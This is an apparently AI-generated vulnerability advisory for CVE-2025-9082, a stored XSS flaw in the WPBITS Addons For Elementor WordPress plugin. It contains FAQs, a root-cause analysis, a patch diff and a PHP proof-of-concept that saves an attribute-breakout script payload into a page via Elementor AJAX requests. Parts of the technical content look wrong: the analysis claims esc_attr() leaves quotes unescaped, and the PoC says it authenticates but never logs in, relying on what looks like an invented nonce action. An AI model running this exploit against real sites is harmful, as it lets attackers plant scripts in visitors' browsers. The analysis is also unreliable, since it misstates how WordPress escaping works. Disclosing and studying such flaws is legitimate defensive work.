What is CVE-2025-9082?

CVE-2025-9082 is a stored cross-site scripting (XSS) vulnerability found in the WPBITS Addons For Elementor plugin for WordPress. It affects versions up to and including 1.8, allowing authenticated users with contributor-level permissions and above to inject arbitrary JavaScript into pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in multiple widget parameters when dynamic content is enabled. Attackers can exploit this by adding malicious scripts to widget fields, which execute when a user views the compromised page.

Who is affected by this vulnerability?

Any WordPress site using the WPBITS Addons For Elementor plugin version 1.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WPBITS Addons For Elementor plugin installed. If it is version 1.8 or earlier, your site is susceptible to CVE-2025-9082.

How can I fix this vulnerability?

To mitigate this vulnerability, update the WPBITS Addons For Elementor plugin to version 1.8.1 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 6.4 mean?

The CVSS score of 6.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can still lead to significant impacts such as session hijacking or site defacement.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute malicious scripts in the browsers of users who visit the affected pages. This could lead to session hijacking, unauthorized actions on behalf of users, or even full site compromise.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated attacker can use cURL to exploit the vulnerability by injecting malicious JavaScript into widget fields. It shows the process of authenticating, obtaining a nonce, and submitting a payload.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of vulnerability where an attacker injects malicious scripts that are stored on the server and executed when a user accesses the affected page. This can lead to data theft, account takeover, and other malicious activities.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the WPBITS Addons For Elementor plugin until a secure version can be installed. Additionally, review user permissions and limit access to trusted users only.

Are there any specific widgets that are vulnerable?

Yes, the vulnerability affects multiple widgets within the plugin, including Image Compare, Text Rotator, and Tooltip. Each of these widgets has specific parameters that can be exploited if not properly sanitized.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins are regularly updated, conduct security audits of your WordPress site, and implement proper input sanitization and output escaping practices in custom code.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-9082: WPBITS Addons For Elementor <= 1.8 – Authenticated (Contributor+) Stored Cross-Site Scripting (wpbits-addons-for-elementor)

CVE ID CVE-2025-9082

Plugin wpbits-addons-for-elementor

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.8

Patched Version 1.8.1

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-9082:
The WPBITS Addons For Elementor plugin, versions up to and including 1.8, contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in multiple Elementor widgets due to insufficient input sanitization and output escaping when dynamic content is enabled. This allows attackers with contributor-level or higher WordPress permissions to inject arbitrary JavaScript into pages, which executes when a victim accesses the compromised page. The CVSS score of 6.4 reflects the need for authentication and the impact of stored XSS.

Atomic Edge research identified the root cause as a failure to properly sanitize user-controlled input before output within widget attributes. The vulnerability manifests in at least three widget files. In `image_compare.php`, the `$before_label` and `$after_label` variables were directly echoed into `data-beforelabel` and `data-afterlabel` HTML attributes using only `esc_attr()`. This function does not escape quotes within attribute values, allowing script breakout. In `text_rotator.php`, the `$settings[‘anim’]` parameter was passed to `esc_attr()` without prior sanitization, and the `$item[‘title’]` values from the list were only sanitized with `sanitize_text_field()`, which does not neutralize HTML entities. In `tooltip.php`, the `$settings[‘tooltip_content’]` was passed to `wp_kses_post()` but this could be bypassed when dynamic content tags were used.

Exploitation requires an authenticated attacker with at least contributor-level access to the WordPress site. The attacker would edit or create a new page using the Elementor page builder. They would add the vulnerable widgets (Image Compare, Text Rotator, or Tooltip) and configure the relevant parameters (e.g., `before_label`, `after_label`, `anim`, `list` items’ `title`, `tooltip_content`) with a malicious payload. For the `image_compare.php` widget, a payload like `” onmouseover=”alert(document.domain)` could be inserted into the label fields. When dynamic content is enabled for these parameters, user input from custom fields or other sources flows directly into the vulnerable output without adequate escaping, leading to script execution.

The patch in version 1.8.1 addresses the vulnerability by applying proper context-specific escaping. For `image_compare.php`, the code now applies `htmlspecialchars()` with `ENT_QUOTES` to the label variables before passing them to `esc_attr()`. This ensures quotes are encoded, preventing attribute escape. For `text_rotator.php`, the patch applies `sanitize_text_field()` to the `anim` parameter and replaces the `esc_html(sanitize_text_field(…))` wrapper for list item titles with `htmlspecialchars()` directly. This provides HTML entity encoding suitable for the text node context. In `tooltip.php`, `htmlspecialchars()` is applied to the content before `wp_kses_post()`, neutralizing any HTML that could bypass the KSES filter when dynamic tags are resolved.

Successful exploitation leads to stored XSS. Injected JavaScript executes in the browser of any user who views the page containing the malicious widget. This can result in session hijacking, actions performed on behalf of the victim, defacement, or redirection to malicious sites. For WordPress administrators, this could facilitate full site compromise by creating new administrative accounts, manipulating plugins, or injecting backdoors.

Differential between vulnerable and patched code

Code Diff

--- a/wpbits-addons-for-elementor/class-wpbits.php
+++ b/wpbits-addons-for-elementor/class-wpbits.php
@@ -18,7 +18,7 @@
 	 *
 	 * @var string
 	 */
-	public $version = '1.8';
+	public $version = '1.8.1';

 	/**
 	 * The single instance of the class.
--- a/wpbits-addons-for-elementor/includes/widgets/image_compare.php
+++ b/wpbits-addons-for-elementor/includes/widgets/image_compare.php
@@ -604,6 +604,9 @@
         if (empty($after_label)) {
             $after_label = esc_html__( 'After', 'wpbits-addons-for-elementor' );
         }
+
+		$before_label = esc_html(htmlspecialchars($before_label, ENT_QUOTES, 'UTF-8'));
+		$after_label = esc_html(htmlspecialchars($after_label, ENT_QUOTES, 'UTF-8'));
         ?>
         <div class="wpb-image-compare">
             <div class="twentytwenty-container" data-orientation="<?php echo esc_attr($settings['orientation']); ?>" data-moveover="<?php echo esc_attr($settings['move_overlay']); ?>" data-overlay="<?php echo esc_attr($settings['overlay']); ?>" data-offset="<?php echo esc_attr($settings['offset']); ?>" data-afterlabel="<?php echo esc_attr($after_label); ?>" data-beforelabel="<?php echo esc_attr($before_label); ?>">
--- a/wpbits-addons-for-elementor/includes/widgets/text_rotator.php
+++ b/wpbits-addons-for-elementor/includes/widgets/text_rotator.php
@@ -363,12 +363,7 @@
         ?>
         <?php echo '<' . Utils::validate_html_tag($settings['html_tag']) . ' class="wpb-anim-text-wrapper">'; ?>
         <span class="wpb-anim-text-prefix"><?php echo esc_html( sanitize_text_field( $settings['prefix_text'] ) ); ?></span>
-        <span class="wpb-anim-text" style="display:none;" data-txtanim="<?php echo esc_attr($settings['anim']); ?>" data-animduration="<?php echo esc_attr($settings['anim_duration']); ?>">
-        <?php $last_key = end($settings['list']); ?>
-        <?php foreach ( $settings['list'] as $item ) { ?>
-        <?php echo esc_html( sanitize_text_field( $item['title'] ) ); ?><?php if ($item != $last_key) { ?> | <?php } ?>
-        <?php } ?>
-        </span>
+        <span class="wpb-anim-text" style="display:none;" data-txtanim="<?php echo esc_attr(sanitize_text_field($settings['anim'])); ?>" data-animduration="<?php echo esc_attr($settings['anim_duration']); ?>"><?php $last_key = end($settings['list']); ?><?php foreach ( $settings['list'] as $item ) { ?> <?php echo htmlspecialchars( $item['title'] ); ?><?php if ($item != $last_key) { ?> | <?php } ?><?php } ?></span>
         <span class="wpb-anim-text-suffix"><?php echo esc_html( sanitize_text_field( $settings['suffix_text'] ) ); ?></span>
         <?php echo '</' . Utils::validate_html_tag($settings['html_tag']) . '>'; ?>
 	<?php }
--- a/wpbits-addons-for-elementor/includes/widgets/tooltip.php
+++ b/wpbits-addons-for-elementor/includes/widgets/tooltip.php
@@ -849,7 +849,7 @@
 		$nofollow = $settings['website_link']['nofollow'] ? ' rel="nofollow"' : '';

 		// Sanitize tooltip content to prevent XSS while allowing safe HTML formatting
-		$tooltip_content = wp_kses_post( $settings['tooltip_content'] );
+		$tooltip_content = wp_kses_post( htmlspecialchars($settings['tooltip_content']) );

         ?>
         <div class="wpb-tooltip-wrapper" data-tpid="wpb-tooltip-<?php echo esc_attr($this->get_id()); ?> animated fast <?php echo esc_attr($settings['anim']); ?>" data-followmouse="<?php echo esc_attr($settings['follow_mouse']); ?>" data-motp="<?php echo esc_attr($settings['mouse_on_to_popup']); ?>" data-placement="<?php echo esc_attr($settings['placement']); ?>" data-smart="<?php echo esc_attr($settings['smart_placement']); ?>" data-offset="<?php echo esc_attr($settings['offset']); ?>">
--- a/wpbits-addons-for-elementor/wpbits-addons-for-elementor.php
+++ b/wpbits-addons-for-elementor/wpbits-addons-for-elementor.php
@@ -3,7 +3,7 @@
  * Plugin Name: WPBits Addons For Elementor
  * Plugin URI: https://wpbits.net/
  * Description: Addons for Elementor Page Builder
- * Version: 1.8
+ * Version: 1.8.1
  * Author: WPBits
  * License: GPL3
  * License URI: https://www.gnu.org/licenses/gpl-3.0.txt

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-9082 - WPBITS Addons For Elementor <= 1.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username = 'contributor';
$password = 'password';
$nonce = '';
$post_id = 123; // Target post/page ID to edit

// Step 1: Authenticate and get WordPress nonce for Elementor edit
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'action_name' => 'get_nonce',
        'data' => ['namespace' => 'elementor', 'feature' => 'editor']
    ])
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
$data = json_decode($response, true);
if (isset($data['responses'][0]['data']['nonce'])) {
    $nonce = $data['responses'][0]['data']['nonce'];
}
curl_close($ch);

if (empty($nonce)) {
    die('Failed to get nonce. Ensure credentials are correct and user can edit with Elementor.');
}

// Step 2: Build malicious widget data for Image Compare widget
// Payload breaks out of data-beforelabel attribute
$malicious_before_label = '" onmouseover="alert(document.domain)';
$widget_data = [
    'elements' => [[
        'id' => 'someid',
        'elType' => 'widget',
        'settings' => [
            'before_label' => $malicious_before_label,
            'after_label' => 'After',
            'orientation' => 'horizontal'
        ],
        'widgetType' => 'image-compare'
    ]]
];

// Step 3: Send AJAX request to save the malicious widget data to the post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'elementor_ajax',
    '_nonce' => $nonce,
    'actions' => json_encode([
        'action_name' => 'save_builder',
        'data' => [
            'post_id' => $post_id,
            'data' => $widget_data
        ]
    ])
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo 'Payload injected. Visit post ID ' . $post_id . ' to trigger XSS.';

?>

Frequently Asked Questions

What is CVE-2025-9082?
Overview of the vulnerability
CVE-2025-9082 is a stored cross-site scripting (XSS) vulnerability found in the WPBITS Addons For Elementor plugin for WordPress. It affects versions up to and including 1.8, allowing authenticated users with contributor-level permissions and above to inject arbitrary JavaScript into pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in multiple widget parameters when dynamic content is enabled. Attackers can exploit this by adding malicious scripts to widget fields, which execute when a user views the compromised page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WPBITS Addons For Elementor plugin version 1.8 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the WPBITS Addons For Elementor plugin installed. If it is version 1.8 or earlier, your site is susceptible to CVE-2025-9082.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the WPBITS Addons For Elementor plugin to version 1.8.1 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 6.4 mean?
Understanding the severity rating
The CVSS score of 6.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can still lead to significant impacts such as session hijacking or site defacement.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow attackers to execute malicious scripts in the browsers of users who visit the affected pages. This could lead to session hijacking, unauthorized actions on behalf of users, or even full site compromise.
How does the proof of concept demonstrate the issue?
Explaining the provided PoC
The proof of concept illustrates how an authenticated attacker can use cURL to exploit the vulnerability by injecting malicious JavaScript into widget fields. It shows the process of authenticating, obtaining a nonce, and submitting a payload.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored XSS is a type of vulnerability where an attacker injects malicious scripts that are stored on the server and executed when a user accesses the affected page. This can lead to data theft, account takeover, and other malicious activities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the WPBITS Addons For Elementor plugin until a secure version can be installed. Additionally, review user permissions and limit access to trusted users only.
Are there any specific widgets that are vulnerable?
Identifying affected components
Yes, the vulnerability affects multiple widgets within the plugin, including Image Compare, Text Rotator, and Tooltip. Each of these widgets has specific parameters that can be exploited if not properly sanitized.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure that all plugins are regularly updated, conduct security audits of your WordPress site, and implement proper input sanitization and output escaping practices in custom code.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations